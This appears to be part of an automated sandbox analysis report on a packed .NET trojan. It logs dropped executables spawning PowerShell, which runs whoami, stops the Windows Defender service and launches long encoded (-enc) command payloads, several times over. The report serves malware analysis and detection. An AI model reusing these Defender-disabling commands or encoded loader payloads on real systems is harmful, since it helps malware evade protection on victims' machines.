Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acga
kahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acga
kahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@
Source: C:\Users\user\AppData\Roaming\Loaader.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Loaader.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Loaader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Client.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Infected.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
